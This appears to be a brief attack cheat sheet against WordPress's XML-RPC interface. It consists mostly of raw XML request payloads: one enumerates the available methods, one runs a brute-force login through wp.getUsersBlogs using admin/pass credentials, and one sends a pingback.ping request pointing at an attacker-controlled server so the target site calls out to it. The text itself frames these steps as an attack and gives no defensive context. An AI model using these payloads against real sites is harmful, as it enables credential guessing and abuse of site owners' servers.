list all methods
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Search for the following , if you find that they are available then we can proceed with the attack *)wp.getUserBlogs *)wp.getCategories *)metaWeblog.getUsersBlogs
perform the bruteforce login
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
List all the methods and search for the following ‘pingback.ping’
Start your server and send the following request in post data
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>